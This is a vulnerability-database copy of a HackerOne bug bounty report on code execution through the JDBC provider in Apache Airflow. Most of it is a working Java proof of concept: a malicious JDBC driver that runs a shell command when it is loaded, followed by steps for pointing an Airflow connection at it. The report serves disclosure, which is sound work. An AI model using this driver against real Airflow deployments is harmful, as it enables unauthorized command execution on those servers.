Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
hackeroneKmhlyxj0H1:2065288
HistoryJul 12, 2023 - 11:04 a.m.

Internet Bug Bounty: jdbc apache airflow provider code execution vulnerability

2023-07-1211:04:08
kmhlyxj0
hackerone.com
$520
32
internet bug bounty
apache airflow
code execution
jdbc vulnerability
privilege escalation
java code
driver path
driver class
vulnerability reproduction
jdbc connection
test button
email exchange
airflow developers
JSON

In airflow.providers.jdbc.hooks.jdbc.JdbcHook, A privilege escalation vulnerability exists in a system due to controllable Driver Path and Driver Class parameters which cause executing any java code.

Vulnerability reproduction steps:

  1. create a malicious jdbc driver, like this
import java.io.*;
import java.sql.*;
import java.util.Properties;
import java.util.logging.Logger;

public class Test implements Driver {

    static {
        try {
            cmd();
            DriverManager.registerDriver(new Test());
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    @Override
    public Connection connect(String url, Properties info) throws SQLException {
        return null;
    }

    @Override
    public boolean acceptsURL(String url) throws SQLException {
        try {
            cmd();
        } catch (IOException e) {
            throw new RuntimeException(e);
        }
        // 验证URL是否为该驱动程序所支持的URL
        return url.startsWith("jdbc:mydb:");
    }

    @Override
    public DriverPropertyInfo[] getPropertyInfo(String url, Properties info) throws SQLException {
        return new DriverPropertyInfo[0];
    }

    @Override
    public int getMajorVersion() {
        return 1;
    }

    @Override
    public int getMinorVersion() {
        return 0;
    }

    @Override
    public boolean jdbcCompliant() {
        return false;
    }

    @Override
    public Logger getParentLogger() throws SQLFeatureNotSupportedException {
        return null;
    }

    public static void cmd() throws IOException {
        String[] cmd = {"sh", "-c", "whoami"}; 
        Process p = Runtime.getRuntime().exec(cmd);
        InputStream in = p.getInputStream();
        BufferedReader reader = new BufferedReader(new InputStreamReader(in));
        File outputFile = new File("/tmp/airflow-jdbc.txt");
        BufferedWriter writer = new BufferedWriter(new FileWriter(outputFile));
        String line;
        while ((line = reader.readLine()) != null) {
            writer.write(line);
            writer.newLine();
        }
        writer.close();
    }
}

generate a jar package.

  1. config jdbc connection
    Go to the Connection configuration page.
    Fill in the driver path with the path of jar package generated in the previous step.
    Fill in the driver class with the value of Test.

  2. click on the test button
    Click on the test button and it can be observed that the command is executed and a file named airflow-jdbc.txt is generated in the /tmp directory.

This is a screenshot of my email exchange with Airflow developers:

███

JSON